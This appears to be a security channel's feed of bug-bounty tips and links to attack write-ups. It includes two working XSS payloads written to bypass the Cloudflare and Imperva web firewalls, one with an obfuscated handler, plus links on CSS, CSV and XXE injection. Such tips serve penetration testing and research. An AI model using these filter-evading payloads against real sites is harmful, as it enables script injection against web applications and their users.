Information Security

cloudflare «XSS» payload to bypass protection.
🦍

{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}

#BugBounty #BugBountyTip #WAF #infosec

@sec_nerd

10 views07:51

امنیت اطلاعات

cloudflare «XSS» payload to bypass protection. 🦍 {` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´} #BugBounty #BugBountyTip #WAF #infosec @sec_nerd

http://waf.m.workers.dev/?x=%3Cbody/\%3C/onscroll/=1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))%3E

248 views07:52

Information Security

https://dirkjanm.io/office-365-network-attacks-via-insecure-reply-url/

dirkjanm.io

Office 365 network attacks - Gaining access to emails and files via an insecure Reply URL

One of the main powers of Office 365 is the tight integration between all the online applications. At the same time this is a risk since those applications have access to other elements such as emails in Outlook or files on SharePoint/Onedrive. This means…

235 views07:56

Information Security

https://vlang.io/docs

239 views08:00

Information Security

https://blog.redteam.pl/2019/10/bypassing-llmnr-nbns-honeypot.html

blog.redteam.pl

Bypassing LLMNR/NBT-NS honeypot

red team, blue team, penetration testing, red teaming, threat hunting, digital forensics, incident response, cyber security, IT security

139 views13:48

Information Security

https://medium.com/@ranakhalil101/hack-the-box-valentine-writeup-w-o-metasploit-1b4288406713

Medium

Hack The Box — Valentine Writeup w/o Metasploit

This is the 8th blog out of a series of blogs I will be publishing on retired HTB machines in preparation for the OSCP. The full list of…

220 views17:52

Information Security

https://github.com/MrAnde7son/PowerShell

GitHub

GitHub - MrAnde7son/PowerShell: Some security related PowerShell scripts I developed.

Some security related PowerShell scripts I developed. - GitHub - MrAnde7son/PowerShell: Some security related PowerShell scripts I developed.

131 views18:35

Information Security

https://github.com/trimstray/nginx-admins-handbook

GitHub

GitHub - trimstray/nginx-admins-handbook: How to improve NGINX performance, security, and other important things.

How to improve NGINX performance, security, and other important things. - trimstray/nginx-admins-handbook

120 views16:40

Information Security

CSS Injection Primitives

https://x-c3ll.github.io/posts/CSS-Injection-Primitives/

Doomsday Vault

CSS Injection Primitives

Collection of CSS / HTML primitives. Tricks to use as an alternative to JavaScript (exfiltration, timing, etc.)

131 views16:53

Information Security

http://ghostlulz.com/csv-injection/

Ghostlulz

CSV Injection - Ghostlulz

How to use CSV injection AKA Formula injection to embed a malicous payload into to spread sheet.

160 views16:55

Information Security

Forwarded from امنیت اطلاعات

Imperva WAF Bypass for XSS;

<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">

- without parentheses, 'alert', 'document.domain' , 'window' , space

#waf
#web
#pentest

@sec_nerd

7 views02:35

Information Security

https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2019/october/bypassing-authentication-on-ssh-bastion-hosts/

117 views09:24

Information Security

XXE Cheat Sheet

XXE - XML External ENTITY Injection

https://securityidiots.com/Web-Pentest/XXE/XXE-Cheat-Sheet-by-SecurityIdiots.html

Securityidiots

XXE Cheat Sheet by SecurityIdiots

SecurityIdiots - A Blog to keep a note of stuff we explore

122 views09:28

Information Security

https://gist.github.com/terjanq/fdb23ae109446b826a4b37df88efae07